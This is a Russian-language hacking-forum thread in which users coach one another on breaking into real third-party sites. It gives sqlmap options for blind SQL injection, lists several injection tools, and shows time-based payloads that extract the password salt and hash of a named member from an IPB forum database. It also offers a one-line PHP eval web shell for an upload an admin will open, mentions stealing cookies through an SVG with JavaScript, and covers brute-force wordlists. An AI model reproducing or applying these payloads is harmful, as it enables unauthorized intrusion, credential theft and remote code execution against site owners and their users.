Если руками крутится значит и сульмап должен видеть. Ему надо точный параметр. В таргете что-то не так
based blind без этих значений мап не увидит уязвимость. Так что обязательно надо подставлять. А там уже и темперы по надобности
Ну хз... У меня лично без этих значений не видел мап уязвимости based blind, ни по GET и POST параметру
sqlmap https://github.com/ron190/jsql-injection https://github.com/alessiovierti/blindpie https://github.com/awnumar/blind-sql-bitshifting https://github.com/missDronio/blindy
Не помогло(( Мапа на отрез отказывается видеть, марковка хоть как-то реагирует, мапа тупо игнорить. Какие ещё есть варианты ?
Есть еще SQLI Dumper. Пихай скулю в него. Может получиться. Но почему мап не видет тут загадка. Я думаю что в таргете что-то не так. Тебе нужно просканировать бурпом. И результаты с него кинуть в мап. Я так понял у тебя по GET запросу скуля? Подставляй значение --level=5 --risk=3 --space2comment --random-agent и потоки выставь на минимум. Пробуй менять значение. Если по POST запросу скуля, то Дампером и не пробуй даже
Мапой добился вывода имена БД , Mysql 5+, таблицы выводить не хочет , начинает брутфорсить и ничего не находит, думаю там префикс не стандартный который надо узнать, двигло IPB, дефолтные талицы не подхоят
Выдрал талицу, вектор вот такой(оказалось вот такой префикс ibf_) Code: and (select sleep(5) from dual where (select members_pass_salt from ibf_members where name like '%Wilda%' limit 0,1) like '______')-- -' True and (select sleep(5) from dual where (select members_pass_hash from ibf_members where name like '%Wilda%' limit 0,1) like '________________________________')-- -' True Из чего следует что соль будет 5 символов, а хєш пароля 32 Вопрос,я понял что теперь остается брутить символы, только как узнать правильную их последовательность?
Есть саит которыи позволяет загружать .php фаилы которые доступны админу он их открывает(проверил отправив svg с js-ом) но у меня в тои директории нету доступа по IP (Forbided), вопрос что можно отправить ему в php фаиле чтоб получить доступ после выполнение(нужно максимально все варианты запихнуть в php шанс думаю будет 1)? PS. Одна из идеи было переписать .htaccess
записать в файл <? eval($_GET[cmd]);?> Можно замаскировать в base64, или посмотреть ещё вариаты минишелов, которые менее всего привлекают внимания. Есть ещё варианты, но надо знать локальный путь
Ты внимательно читаи знаеш что твкое IP?+(проверил отправив svg с js-ом) я отправив js получял уже куки и там по кукам видно что ораничения по IP )
Где я могу наить отдельно все комбинацыии из для Bruteforce Code: 4 цыфр 5 цыфр 6 цыфр 7 цыфр 8 цыфр 9 цыфр 10 цыфр
сгенерировать самому через http://unifiedlm.com/Download или PasswordsPro /Если верно помню 10 цифр будет весить 111 Гб